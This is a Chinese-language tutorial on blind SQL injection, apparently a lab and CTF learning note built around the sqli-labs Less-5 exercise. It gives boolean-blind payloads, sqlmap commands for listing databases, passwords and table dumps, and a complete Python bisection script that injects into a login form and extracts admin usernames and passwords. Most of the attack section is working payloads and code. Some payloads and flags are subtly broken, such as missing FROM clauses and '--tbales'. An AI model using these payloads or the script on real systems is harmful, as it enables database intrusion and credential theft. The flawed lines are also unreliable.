盲注

页面不提供查询成功的结果,没有显示位,以第5关为例:

布尔盲注

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
猜测数据库

?id=1' and length(database())=8-- -

id=1' and left(database(),1)>'a' -- - 1

id=1' and left(database(),1)>'z' -- - 0

在 a-z 之间

id=1' and left(database(),1)>'r' -- -1

id=1' and left(database(),1)>'s' -- -0

id=1' and left(database(),2)>'sa'-- -

猜测表

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>111 a 是从 0 开始第几个表,b 是为第几个字符,n 是 ASCII 所对应的十进制数

第一个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101

第二个表 ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断 user 表 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段 http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

sqlmap的使用

常规:python sqlmap.py -u”127.0.0.1/sqllabs/Less-5/?id=1”

python sqlmap.py -u”127.0.0.1/sqllabs/Less-5/?id=1” –tables -D security

万能用法(跑数据包),适用于post型

burp抓包保存为1.txt

1
2
3
4
5
6
7
8
9
10
11
12
python sqlmap.py -r "1.txt"                               #检测注入点是否可用
python sqlmap.py -r "1.txt" --dbs                      #爆出该mysql中所有数据库名称
python sqlmap.py -r "1.txt" --current-db            #web当前使用的数据库
python sqlmap.py -r "1.txt" --current-user         #web数据库使用账户
python sqlmap.py -r "1.txt" --users                   #列出sql所有用户
python sqlmap.py -r "1.txt" --passwords           #数据库账户与密码
python sqlmap.py -r "1.txt" --tbales                  #输出所有的表
python sqlmap.py -r "1.txt" -D  --tables             #根据数据库名输出所有的表
python sqlmap.py -r "1.txt" -D -T  --columns      #爆出字段名(列名)
python sqlmap.py -r "1.txt" -D -T  -C”username,realname,password” --dump  

#指定要爆的字段 -D 数据库名 -T 表名      --threads 线程数,最多为10 --batch 自动选择


被爆出的数据库会生成一个日志文件保存在本地

5到8关代码对比

Less5

Less6

Less7

Less8

拓展:SqlMap参数大全

扩展:盲注二分法脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#-*-coding:utf-8-*-
import requests
import time

host = "http://web.jarvisoj.com:32787/login.php"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            payload= "1'^(ascii(substr((select(database())),%d,1))<%d)^1#" % (i,mid)
            param ={"username":payload,"password":"admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("database is -> "+ans)

def getTable(): #获取表名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))<%d)^1#" % (i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host,data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("table is -> "+ans)

def getColumn(): #获取列名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),%d,1))<%d)^1#" % (
            i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("column is -> "+ans)

def dumpTable():#脱裤
    global host
    ans=''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            payload = "1'^(ascii(substr((select(group_concat(username,0x3a,password))from(admin)),%d,1))<%d)^1#" % (
                i, mid)
            param = {"username": payload, "password": "admin"}
            res = requests.post(host, data=param)
            if "用户名错误" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1)
        print("dumpTable is -> "+ans)

dumpTable()